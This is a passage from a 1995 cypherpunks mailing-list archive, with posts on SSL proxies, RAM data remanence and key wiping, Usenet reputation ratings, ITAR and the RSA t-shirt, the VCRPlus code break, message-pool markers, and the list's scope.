restriction (unless Navigator checks a date in the certificate). I understand that Netscape's browser will also accept certificates created by a Netscape-internal "test" CA. I hoped that perhaps some junk certificates from that CA might be floating around, ones which would be useless for conventional purposes because their secret keys are exposed, but which would be perfect for my needs. There is one "fallback" strategy possible which would allow the 128-bit SSL security proxy to work. That is to filter *all* connections, not just secure ones, and convert https: URL's to http:. Then Navigator will not attempt to make any SSL connections at all, and the proxy can talk to it non-securely, using 128-bit SSL for the external connection to the server. However this would be much harder, and the proxy would have to somehow remember which URL's had been massaged like this so it would know which ones are eligible to have secure connections made. Hal From tn0s+ at andrew.cmu.edu Mon Sep 4 21:31:28 1995 From: tn0s+ at andrew.cmu.edu (Timothy L. Nali) Date: Mon, 4 Sep 95 21:31:28 PDT Subject: Emergency File Wipe Algorithim In-Reply-To: <8B074DD.00030003EA.uuout@famend.com> Message-ID: Excerpts from internet.cypherpunks: 4-Sep-95 Re: Emergency File Wipe Alg.. by MONTY HARDER at famend.com > CW> and relaxation are in the same order of magnitude. Thus, a few microsecon > ds of > CW> storing the opposite data to the currently stored value will have little e > ffect > CW> on the oxide. Ideally, the oxide should be exposed to as much stress at t > he > > Here is a simple way to handle the problem, using our old discredited > friend, XOR. Set up your software to periodically XOR the key with FFFF. > This way, each bit will be a 0 half the time, and a 1 the other half. > You have a flag that tells whether the key is in normal or inverted > form, so that you can quickly perform any necessary computations on it, > but there should not be any long-term memory effect. > > On today's machines, it's a little more complicated than that. After you XOR the key, you have to then flush all the cache lines that contain the key, to make sure that the XOR operation makes it to the main memory. Unless I'm mistaken, a write-back cache will not propogate the XOR operation to main memory unless another memory operation(s) forces bumps the XORed key out of cache memory. Successive XOR operations on the key won't necessarily do this; you need some other memory op to flush the cache lines. _____________________________________________________________________________ Tim Nali \ "We are the music makers, and we are the dreamers of tn0s at andrew.cmu.edu \ the dreams" -Willy Wonka and the Chocolate Factory From wilcoxb at nag.cs.colorado.edu Mon Sep 4 22:12:29 1995 From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox) Date: Mon, 4 Sep 95 22:12:29 PDT Subject: article/author ratings/reputations (was Re: pseudonyms & list health) In-Reply-To: <9509040614.AA01461@cs.umass.edu> Message-ID: <199509050512.XAA08518@nag.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Futplex sez: > > A reviewer named Susan Granger, for example, is known to me as a person who > routinely lauds lousy movies. Thus it's simple for me to ignore her positive > recommendations (I've yet to see a negative review from her). In fact, when > I observe that a new film prominently features her seal of approval in its > advertising, I take that fact as an indication of the lack of praise from > more discriminating reviewers. So a nominal "positive" credential may be > interpreted as an implicit negative credential, depending upon context. > > OTOH, if I only give digital thumbs-up to a couple of people on the list, > those who consider me a reputable appraiser-of-cpunks should find the > information relatively useful. I'm sure I can manage to be a harsher critic > than your 2nd-grade teacher :} Using e.g. a single 1-10 scale would be > highly practical for such purposes, IMHO. There are people working on an extension of UseNet to allow each reader to publish ratings which propagate in the same way that articles do. These ratings can be of specific articles, of threads or of authors. Your newsreaders can rank the articles and present them to you in highest-to-lowest ranked order, or kill all those below a certain mark, or some such. The heuristic that the researchers originally started with was "if I agreed with so-and-so in the past then I'll probably agree with him again." (Personally I would rather have some degree of manual control over my ratings-weightings. My good friends automatically get more weight than people I don't know, regardless of how much our ratings coincide. Similarly I might want to downgrade certain net.assholes just out of a sense of justice, even if they recommend good articles usually. :-) ) Unfortunately I have lost the URL for this wonderful experiment. Hopefully the fruits of their labors will become publically available soon. I will certainly be one of the first to sign up to distribute ratings and to listen to (some) other people's. Bryce signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQCVAwUBMEvcJfWZSllhfG25AQE+0QQAj2rx2gT9gaYlMyhiJd3TkfrjAS9dVcYk iFUHu1wsrcIoXvHExRmvborJArcix7uz/qptO9lg8DHRAxHYGtJyEzDaCnq60juz xFHt/7NdV+gLIv5JVHFDCxTzzfmwNSvr5Q2Rb5vv8jUmih4AhSzkApBHF/lzFhNH 2U3SYK7Vmhc= =Zodf -----END PGP SIGNATURE----- From wilcoxb at nag.cs.colorado.edu Mon Sep 4 22:15:38 1995 From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox) Date: Mon, 4 Sep 95 22:15:38 PDT Subject: Wearing RSA shirt to school In-Reply-To: <199509041203.IAA38469@tequesta.gate.net> Message-ID: <199509050515.XAA08896@nag.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Note failed signature. Great Dave Barry quote, by the way. :-) Bryce ******* rest of message is file included by Bryce - -----BEGIN PGP SIGNED MESSAGE----- Tim wrote: >At 4:43 AM 9/4/95, Futplex wrote: >>I wrote: >>> With respect to possession within the U.S., there aren't any >>> laws stopping you from waving strong cryptography around wherever you lik > e >>> (at least, not yet). >> >>---- >>...and in private email, Jim Ray pointed out that showing the shirt to a >>foreign national might technically violate ITAR... > >Nope, no more so than letting a foreign national read Schneier's book is a >violation of the ITAR. If you dispute this, ask whether Schneier's book is >banned from export (the book, not the optional diskette). It isn't. Nor are >other cryptography _books_ banned from export. The law doesn't have to be consistent, or to make sense, or be enforced evenhandedly. The law is, after all, not written, or interpreted, or enforced, by partisan Libertarians like me. My private email to Futplex said *may* violate... and I stand by it. [IANAL, though.] Whether or not a law as incontrovertably stupid as ITAR is enforced may depend on the timing of the next election, as we seem to be witnessing in the limbo-state of PRZ. >I'm not minimizing the issue of export of machine-readable code, as in >diskettes. But to claim that a blurry, printed on cotton "barcode" is even >remotely in the same class as exporting a workable set of cryptographic >system routines, or that letting a furriner merely "gaze upon" this blurry >barcode, is a violation of the ITARs is laughable. Yes, but *many* laws are laughable. >>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover >>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then >>flashing it at a furriner could constitute a violation. Thanks for the >>correction. Actually, it was less a correction than me pointing out (yet another) note of uncertainty. James Madison, in Federalist #62 said it best: "What indeed are all the repealing, explaining, and amending laws, which fill and disgrace our voluminous codes, but so many monuments of deficient wisdom." Now, many of us would be more than satisfied to get back to that level of government. I suggest that everyone go have a look at the entire Code of Federal Regulations, before the next election. >the original questioner need not fret about his son wearing the >>shirt to school. I agree that wearing it through Customs on the way to Jamaica would be more problematic, but I live next to a US Customs agent, and he learned about ITAR from me. Here in Miami, Customs has plenty to think about with the various (occasionally venomous) inbound cargo. >It was this series of posts about whether wearing the "munitions t-shirt" >near schools was a crime or not that made me think the silly season had >arrived. It has, a long time ago. Ever watch C-SPAN? JMR - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMEro1W1lp8bpvW01AQHKsgP/bhOcCUoksLvbGe/nAKxDqZU8KvibvRFm nQ++Xy3FjDDJrFg1/lgmivtrriuFK/xg4CvKdu+yQ6zJ72pH+92cLivsfHeg+ljZ MPSXfHftaOP7i1e4KajnlC3jBcYbWQnqZRdduIyPXZnfn5xK5bU99c5oceCABtSx UD/Hp9Poqbc= =7tMD - -----END PGP SIGNATURE----- Regards, Jim Ray See, when the GOVERNMENT spends money, it creates jobs; whereas when the money is left in the hands of TAXPAYERS, God only knows what they do with it. Bake it into pies, probably. Anything to avoid creating jobs. -- Dave Barry - ------------------------------------------------------------------------ PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray - ------------------------------------------------------------------------ Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf ________________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQCVAwUBMEvc4vWZSllhfG25AQHtewP/YYdT/kcDZOtykQnKKU6OTcas006ft/dq nB76g1DBJqNzyZj4UHE+AVoMZ61wCMXHUwjipTwfXHMYwJ5ystJQ9LbPUgMIb1kx GNyZua7VJwvaGO2+M0FCzBopoQs2MavegxPdAPaxquZJWlB1KesbLkNoUWIF4St6 XtxP4EcVec4= =1bvR -----END PGP SIGNATURE----- From sandfort at crl.com Mon Sep 4 23:48:23 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 4 Sep 95 23:48:23 PDT Subject: DUMPSTER BONANZA Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, This is not a crypto post, but those interested in threat models and counter-measures might want to read on. I just looked at the October issue of Soldier of Fortune. In an article entitled "SOF Exposes ATF's Warbirds" the author tells about the 7 to 12 attack aircraft that the BATF has purchased. Of course, it's interesting to hear how and why this agency decided it needed an airforce to pursue its mission, but the real story for me was how SOF busted them. SOF had heard rumors about a covert operation on the part of the BATF to procure these aircraft. They did their own surveillence of the BATF's phony cover corporation. This included dumpster diving. What they came up with was unbelievable. It included agents home addresses, the names of family members, official BATF stationery, the works. If you want to read a fascinating tale of BATF incompetence and duplicity, check this one out. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From dr261 at cleveland.Freenet.Edu Tue Sep 5 00:01:46 1995 From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke) Date: Tue, 5 Sep 95 00:01:46 PDT Subject: article/author ratings/reputations (was Re: pseudonyms & list health) Message-ID: <199509050701.DAA15561@kanga.INS.CWRU.Edu> This idea of "ratings" over usenet is very interesting.. If anyone has addittional info or URLs where I can look, please send me "private" mail at dr261 at cleveland.freenet. (Or post them to the list, but it doesn't seem crypto-related.) Thanks. -- Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142 dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido From hal9001 at panix.com Tue Sep 5 00:54:29 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Tue, 5 Sep 95 00:54:29 PDT Subject: VCRPLUS Huffman code Message-ID: At 20:06 9/4/95, Stephen D. Williams wrote: >It was broken, and I might have the reference in my archives... > >If I get time I'll find it. Why not just do the simple thing and look at Gemstar Development Corporation's Patent for the details . From cg at bofh.lake.de Tue Sep 5 02:37:38 1995 From: cg at bofh.lake.de (Cees de Groot) Date: Tue, 5 Sep 95 02:37:38 PDT Subject: maximizing cryptographic return In-Reply-To: <8B072A1.00030003E8.uuout@famend.com> Message-ID: A non-text attachment was scrubbed... Name: not available Type: application/x-pgp-message Size: 26 bytes Desc: not available URL: From anon-remailer at utopia.hacktic.nl Tue Sep 5 02:54:36 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Tue, 5 Sep 95 02:54:36 PDT Subject: SUMMARY: Not-so-volatile volatile memoryRe: SUMMARY: Not-so-volatile volatile memory Message-ID: <199509050954.LAA15934@utopia.hacktic.nl> > -- Summary: Data retention in semiconductor memory -- > > Contrary to conventional wisdom, "volatile" semiconductor memory > does not entirely lose its contents when power is removed. Both > static (SRAM) and dynamic (DRAM) memory retain some information on > the data stored in it while power was still applied. SRAM is > particularly susceptible to this problem, as storing the same data > in it over a long period of time has the effect of altering the > preferred power-up state to the state which was stored when power > was removed. Older SRAM chips could often "remember" the previously > held state for several days. In fact, it is possible to manufacture > SRAM's which always have a certain state on power-up, but which can > be overwritten later on - a kind of "writeable ROM". Is this a new discovery? When I used to work with DOD classified data, not so long ago, disk drives had to be declassified using an approved program, such as Norton Utilities' "WIPEINFO". (That was approved up through the SECRET/SAR level, anyway. I don't know about TS/SCI/SI.) But those same regulations said that RAM was considered declassified within a certain time (30 seconds, I think) after power was removed. (That time figure was UNclassified, BTW.) I think it was just to allow time for the voltage to bleed off of the power supply's filter capacitors, and not related to the relative volatility of DRAM. From trei at process.com Tue Sep 5 07:35:31 1995 From: trei at process.com (Peter Trei) Date: Tue, 5 Sep 95 07:35:31 PDT Subject: VCRPLUS Huffman code Message-ID: <9509051435.AA15596@toad.com> > Has anyone worked out the VCRPLUS code? It was partially broken a few years ago, and the results published in Cryptologia. I have a xerox in a carton somewhere. The break was for codes up to 4or 5 digits long, if I recall - this covers most of the major timeslots on the main stations. Longer codes cover odd timeslots on less popular stations. Code which implemented this partial crack was published on the net, and the VCR+ people got very upset about it - apparently they make money selling the codes to TV Guide and newspapers. It's protected as a trade secret, not a patent. It used a combination of lookup tables and Huffman codes, and included a certain amount of obfuscation to resist cracking. Peter Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From trei at process.com Tue Sep 5 07:46:52 1995 From: trei at process.com (Peter Trei) Date: Tue, 5 Sep 95 07:46:52 PDT Subject: Non-US SSL128 site Message-ID: <9509051446.AA16057@toad.com> > > a) Use 128 bit SSL if the client allows it. > > b) Tell users which cipher is being used on a secure session. > Netscape's press release on the RC4-40 crack seems to have disappeared from > their home page, but I don't remember any specific mention of 128-bit > U.S.-only clients, just servers. > So what's up? Netscape sells a 128-bit US-only client for $39 Peter Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From adam at bwh.harvard.edu Tue Sep 5 07:55:29 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 5 Sep 95 07:55:29 PDT Subject: Non-US SSL128 site In-Reply-To: <9509051446.AA16057@toad.com> Message-ID: <199509051449.KAA13448@joplin.bwh.harvard.edu> | Netscape sells a 128-bit US-only client for $39 Does the US only server also do des, 3des and IDEA, or just rc4-128? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jeffb at sware.com Tue Sep 5 08:12:35 1995 From: jeffb at sware.com (Jeff Barber) Date: Tue, 5 Sep 95 08:12:35 PDT Subject: Non-US SSL128 site In-Reply-To: <199509051449.KAA13448@joplin.bwh.harvard.edu> Message-ID: <9509051506.AA09665@wombat.sware.com> Adam Shostack writes: > | Netscape sells a 128-bit US-only client for $39 > Does the US only server also do des, 3des and IDEA, or just > rc4-128? Yes. It does: RC4 - 128 RC4 - 40 RC2 - 128 RC2 - 40 IDEA DES, "64 bits" DES "with EDE 3, 192 bits" -- Jeff From asgaard at sos.sll.se Tue Sep 5 09:33:35 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Tue, 5 Sep 95 09:33:35 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) In-Reply-To: Message-ID: Black Unicorn posted a very interesting info summary on the subject of foreign state US$$ forgery. This is a story I heard, long ago, from a Brit, Mr Waterlow, about something that happened to his grandfather, chairman of the Waterlow bank: Early in this century Portugal didn't print it's own money but contracted this job to the Waterlow Bank in England. Some skilled conmen succeeded in making the bank beleive they were representatives of the Portugeese National Bank. Then they ordered a huge amount of new bills and got away (at least for some time) with it. Now, the point is that this was acually GOOD for the Portugeese ecomomy, the real National Bankers having underestimated the optimal size of their cash stock. So, I wonder, perhaps the world economy might benefit from some Iranian addings to the number of $$ araound? A Keynesian boost? Just drifting (I know very little about economy...). Mats From andrew_loewenstern at il.us.swissbank.com Tue Sep 5 09:45:12 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 5 Sep 95 09:45:12 PDT Subject: Emergency File Wipe Algorithim Message-ID: <9509051644.AA00586@ch1d157nwk> Peter Gutmann writes in an article quoted by Christian Wettergren > The greater the amount of time that new data has existed in the > cell, the more the old stress is "diluted", and the less reliable > the information extraction will be. Generally, the rates of change > due to stress and relaxation are in the same order of magnitude. > Thus, a few microseconds of storing the opposite data to the ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ > currently stored value will have little effect on the oxide. ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ Phill Hallam writes: > If the power is cycled as opposed to turned off only then a memory > self test program will probably erase the data. Assuming Peter Gutmann is correct, a memory test program "probably" won't do much. Of course, you data must be worth quite a pretty penny for an attacker to attempt to recover data from the oxides on the cells in your RAM. andrew From tcmay at got.net Tue Sep 5 09:46:15 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Sep 95 09:46:15 PDT Subject: "This discussion is off-topic, please take it elsewhere" Message-ID: At 5:58 AM 9/5/95, Sandy Sandfort wrote: >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > >C'punks, > >This is not a crypto post, but those interested in threat models >and counter-measures might want to read on. This brings up an important issue. Sorry it is not written in C, or even TCL. I actually agree with a point the noted tentacle VZNuri ("visionary," obviously) wrote, namely, that people are getting entirely too apologetic (myself included, though most of my "apologies" have had an ironic edge to them) about posting things that are other than about coding in C, writing sockets for Windows, or breaking SSL. Folks, this list is about a _lot more_ than just some facet of writing software. It started as a wide-ranging list, with many topics, many interests. I don't think I need to try to list the topics, but they obviously include things such as legal issues, policy, PGP, remailers, digital money, money laundering, regulatory arbitrage, data havens, steganography, languages, frameworks, Unix utilities, and dozens of other related topics. We've covered hundreds of topics, and are probably the only such list on the planet that routinely considers the ramifications and ways of actually building the exciting ideas that the academics at the Crypto conferences discover and write about. (I can tell you that one of the main motivations we (Eric and I) had in starting the group was to take the academic abstractions, things like "bit commitment" and "dining cryptographers networks" and reify them into actual blocks of code, or running programs.) Some have argued that "Cypherpunks write code," which has been a short slogan making it clear that one of our main interests is in actually building and deploying these methods. This was a major goal in the spring of 1992 when Eric (Hughes, for any newcomers) and I spent time hashing out what is needed in crypto. As far as I'm concerned, we're on track. Remailers have advanced far beyond the early remailers, and that they exist at all is an accomplishment. The "theory" of remailers is immensely accelerated by having actual remailers in actual use to test theories against and to see real world behaviors. Likewise, message pools have been built. A working anonymous market (BlackNet, for example) has been instantiated, albeit not proliferated. Digital money in various forms (Magic Money, work with Chaum's DigiCash, etc.) has been used. Lots of other examples. PGP, hooks to mail programs (though a lot more are needed), key escrow considerations, etc. Of course, things have gone more slowly in some areas than in others. Digital money, and financial instruments in general, have proceeded in fits and starts. I suspect this indicates that things like money are not done lightly, and that many non-coding issues are intertwined in such a way as to make any "amateur" efforts problematic. But it's only through trying that the obstacles can be seen, so even our failures are useful. Is this "writing code" in all cases? Of course not. Not everything is coding. Planning and preparing is just as important. And consideration of threat models is part and parcel of writing code, else one will not know where to start writing code. Thus, for example, the hundreds of posts here on key escrow (and some of us anticipated Clipper six months before it was announced, allowing the Cypherpunks to hit the ground running as soon as it was announced) and GAK are useful in countering the arguments of those who have spent years planning such escrow (GAK) policies. What I'm getting at is that the "Cypherpunks write code" mantra does not mean that _only_ the few dozen folks actively writing C code can contribute. Indeed, many of the folks now writing code have _claimed_ that they were inspired to write some code in some area--remailers, digital cash, SSL challenges, whatever--by the discussions here on this list. Would they have been so inspired if all political, legal, and cultural discussions had been expunged, if only the arcania of programming and C were being discussed? After all, sci.crypt already exists, and even sci.crypt.research, so why should the Cypherpunks list even exist, as these groups are already ostensibly focussed on pure crypto issues. No, Cypherpunks is about more than just C programming, about more than just IETF issues, about more than just algorithms. I think it great that so much programming discussion occurs, that so much progress is being made. I just think some list.cops are going a bit overboard in their denunciations of "off-topic" posts, and their increasing shrillness in saying that anyone not out there writing Unix crypto programs should stop posting. Those who only want to read about "malloc" and "struct" are encouraged to use the filtering tools which they surely have access to and to stop telling us in shrill voices that posts are "off-topic." --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Tue Sep 5 10:02:53 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Sep 95 10:02:53 PDT Subject: SUMMARY: Not-so-volatile volatile memory Message-ID: At 9:54 AM 9/5/95, Anonymous wrote: >> -- Summary: Data retention in semiconductor memory -- >> >> Contrary to conventional wisdom, "volatile" semiconductor memory >> does not entirely lose its contents when power is removed. Both >> static (SRAM) and dynamic (DRAM) memory retain some information on >> the data stored in it while power was still applied. SRAM is >> particularly susceptible to this problem, as storing the same data >> in it over a long period of time has the effect of altering the >> preferred power-up state to the state which was stored when power >> was removed. Older SRAM chips could often "remember" the previously >> held state for several days. In fact, it is possible to manufacture >> SRAM's which always have a certain state on power-up, but which can >> be overwritten later on - a kind of "writeable ROM". > >Is this a new discovery? When I used to work with DOD classified >data, not so long ago, disk drives had to be declassified using an >approved program, such as Norton Utilities' "WIPEINFO". (That was >approved up through the SECRET/SAR level, anyway. I don't know >about TS/SCI/SI.) But those same regulations said that RAM was >considered declassified within a certain time (30 seconds, I think) >after power was removed. (That time figure was UNclassified, BTW.) >I think it was just to allow time for the voltage to bleed off of >the power supply's filter capacitors, and not related to the >relative volatility of DRAM. The Gutman article was discussing residual/remnant storage a lot more subtle than the usual "bleed-off" charateristics. One interesting twist is using radiation sources to "snapshot" or "freeze" the internal contents of dynamic RAM. I worked with DRAMs for more than a decade at Intel, though never on this particular issue. But I read a lot of the public papers on radiation effects on DRAMS, including the "freezing" of data patterns into DRAMs by exposure. (I recall thinking at the time, circa 1980, that someday raids on computers could involve bringing in flash radiation sources to "snapshot" the contents of DRAM.) Sandia Labs did a lot of the work on this, and results are reported at the annual Nuclear and Space Radiation Effects Conference. The December issue of "IEEE Transactions on Nuclear Science" every year includes the proceedings of this conference. Any large university library should have it. It's also possible to literally freeze a DRAM--with "Arctic Freeze" spray, for example--and stop the self-discharge of DRAM cells. I doubt any of these efforts are being used, though. Looking at how raided computers are simply carted off in the backs of pickup trucks, with disk drives thrown in with monitors, I suspect nothing this sophisticated has ever been tried. Quantico might have some more sophisticated approaches, but they're not publically discussing them. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From cman at communities.com Tue Sep 5 10:33:28 1995 From: cman at communities.com (Douglas Barnes) Date: Tue, 5 Sep 95 10:33:28 PDT Subject: Slightly faster checking for encrypted messages to me Message-ID: Hal -- I've actually given this some thought in the past, and the most practical solution IMHO is much lower tech, although it only works on non-initial messages in a correspondence. If two entities want to communicate via a message pool, without worrying about traffic analysis, but don't want the overhead of trying to decrypt every headerless message to the pool, then they can do the following: 1) In a "headered" message, one of the entities (A) sends a collection of large random numbers to be used as return markers, encrypted with the public key of the desired correspondent (B). 2) B can then respond to A with an essentially headerless message prefixed with one of the numbers send by A. This initial message should contain a list of similar numbers for B, that A can use to send messages to B. 3) Numbers are only used once; entities can now quickly scan the message pool by hashing the initial N bits of each message into a lookup table seeded with all the remaining random return markers they've distributed. 4) As an extension, you can divide your message pools into "initial contact" pools, which would begin with headerless public key encrypted blocks, and "conversation" pools that would begin with return markers. (Of course this is trivially open to denial of service attacks.) This is the basic principal behind the TA-resistant streams over UDP stuff I wrote up for cypherpunks last spring, except in that case a given server does the lookup first, and only then tries to treat the header as a public key encrypted block instead of a MAC. The Rabin stuff is a step in the right direction for the long term, however. From dneal at usis.com Tue Sep 5 10:43:21 1995 From: dneal at usis.com (David Neal) Date: Tue, 5 Sep 95 10:43:21 PDT Subject: A recent article on Electronic Commerce Message-ID: In the August 28, 1995 issue of Communications Week, the editor Mitch Irsfield briefly discusses electronic checking, and the joint venture between Sun, BBN, IBM, et al. He also references an article explaining the venture on Page 5 of the same issue. I dropped him a quick note thanking him for writing a non-hysterical article on cryptography, and also briefly mentioned that some of us would prefer electronic cash to electronic checking. Since part of being a cypherpunk is political, I'd like to encourage everyone to write a quick e-mail which expresses your own views to Mr. Irsfield (678-7017 at mcimail.com). Speaking of talking to the 'public' about crypto-cash, we really need a meme of our own. Just as The Other Side invokes the specters of terrorism and child pornography, we need something like 'traceable transactions', 'government approved checking', 'uncle sam's clearing house', or 'irs approved bill payments.' Obviously the creative types on the list can come up with much better. But, I digress. The Page 5 article doesn't go into much detail, but says in essence that the system is an api layer and a smart card. In the cases of larger corporations, they may require a seperate processor. This says 'encryption in hardware' to me. Gee, wonder if someone found a use for all those useless tessera cards after all? :-) David Neal - GNU Planet Aerospace 1-800-PLN-8-GNU Unix, Sybase and Networking consultant. "...you have a personal responsibility to be pro-active in the defense of your own civil liberties." - S. McCandlish From markm at omni.voicenet.com Tue Sep 5 11:11:08 1995 From: markm at omni.voicenet.com (Mark M.) Date: Tue, 5 Sep 95 11:11:08 PDT Subject: VCRPLUS Huffman code In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net> Message-ID: On Mon, 4 Sep 1995 bplib at nic.wat.hookup.net wrote: > I too would be interested in the VCRPlus code. Has anyone broken it? > Tim Philp > > > You can get the source code to VCR+ encoding and decoding at ftp://sable.ox.ac.uk/pub/crypto/cryptanalysis/vcr+.shar.gz From dr261 at cleveland.Freenet.Edu Tue Sep 5 11:22:45 1995 From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke) Date: Tue, 5 Sep 95 11:22:45 PDT Subject: [trei@process.com: Re: VCRPLUS Huffman code] Message-ID: <199509051806.OAA03038@kanga.INS.CWRU.Edu> ================= Begin forwarded message ================= From: trei at process.com (Peter Trei) To: miniters at citadel.edu, cypherpunks at toad.com Subject: Re: VCRPLUS Huffman code Date: Tue, 05 Sep > Has anyone worked out the VCRPLUS code? It was partially broken a few years ago, and the results published in Cryptologia. I have a xerox in a carton somewhere. The break was for codes up to 4or 5 digits long, if I recall - this covers most of the major timeslots on the main stations. Longer codes cover odd timeslots on less popular stations. Code which implemented this partial crack was published on the net, and the VCR+ people got very upset about it - apparently they make money selling the codes to TV Guide and newspapers. It's protected as a trade secret, not a patent. It used a combination of lookup tables and Huffman codes, and included a certain amount of obfuscation to resist cracking. Peter Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com -- Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142 dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido From trei at process.com Tue Sep 5 11:53:33 1995 From: trei at process.com (Peter Trei) Date: Tue, 5 Sep 95 11:53:33 PDT Subject: SSL trouble Message-ID: <9509051853.AA21783@toad.com> > >I did a distributed scheme for something else that had two levels, a master > >and a group of slaves. Only the slaves talked to the master. For this > >effort I think a variation of the idea would be better. Have all of the > >brutes contact the master, who will, in the first transaction assign them > >to the next slave in a round-robin fashion. > Why not just have the brutes pick a slave at random? Of course, you need > to give them a complete list of slaves to choose from. But then the only > difference between the master and the slaves will be that the master > doesn't get any keyspace (it's got it all to begin with) and doesn't > report any results upward. This is starting to sound like alt.sex.bondage.... Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From blane at eskimo.com Tue Sep 5 12:07:37 1995 From: blane at eskimo.com (Brian Lane) Date: Tue, 5 Sep 95 12:07:37 PDT Subject: VCRPLUS Huffman code In-Reply-To: <9509051435.AA15596@toad.com> Message-ID: On Tue, 5 Sep 1995, Peter Trei wrote: > > > Has anyone worked out the VCRPLUS code? > > Code which implemented this partial crack was published on the net, > and the VCR+ people got very upset about it - apparently they make I believe the code is in the cookbook archive at ftp.ee.ualberta.ca, but when I just tried to confirm I got timeouts. Brian ------------------------------------------------------------------------------ ftp.eskimo.com/blane | | www.eskimo.com/~blane ------------------------------------------------------------------------------ From wec at dallas.net Tue Sep 5 10:17:54 1995 From: wec at dallas.net (Fred Sammet) Date: Tue, 5 Sep 1995 12:17:54 -0500 Subject: response (fwd) Message-ID: <2989ce0b6683a4c535b5c428f0e0275e@NO-ID-FOUND.mhonarc.org> [The following text is in the "iso-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] >> What we need is for Fred to send to you a copy of the >> program in electronic form (I'm waiting for the too -- then I can >> highlight the important sessions for you. ANNOUNCING: The Second Annual . . . WORLDWIDE ELECTRONIC COMMERCE Law, Policy, Security & Controls Conference October 18-20, 1995 At the Hyatt Regency Bethesda Phone: (214) 516-4900 The Second Annual WorldWide Electronic Commerce; Law, Policy, Security and Controls conference is fast approaching. This important event will feature the world's foremost experts addressing the most important issues of implementation and control related to secure electronic commerce. It will focus on current problems and provide a foundation for dealing with the emerging problems that promise to make the future more complex. We have been fortunate in securing a faculty that is unusually qualified and internationally recognized who will share their experience, knowledge and theories on the wide range of issues being addressed by this program. We are equally pleased to have obtained affiliation for this conference of a number of prestigious and influentual organizations. Please join us and your colleagues at this unique event! Michael S. Baum, J.D., M.B.A. Conference Chair Provided in Affiliation with: ============================================= * American Bar Association Section of Science and Technology Information Security Committee * University of London Queen Mary & Westfield College Centre for Commercial Law Studies * EDI Association of the United Kingdom * Harvard Law School * Internation Union of Latin Notaries * International Chamber of Commerce, Paris * National Institute of Standards and Technology (NIST) * Software Publishers Association * United Nations Commission on International Trade Law (UNCITRAL) * U.S. Council of International Business ============================================= Keynote Speaker: ---------------- Dr. Vinton G. Cerf, Ph.D. Senior Vice President MCI Telecommunications Corp. CONFERENCE PROGRAM ...at a glance GENERAL SCHEDULE ------------------------------------------------- Wednesday, October 19, 1995 6:00pm - 7:30pm SECURE ELECTRONIC COMMERCE FOR THE BEGINNER Thursday, October 20, 1995 8:00am - 9:00am Welcome & Keynote Speech 9:00am - 5:50pm Sessions 1 - 5 Friday, October 21, 1995 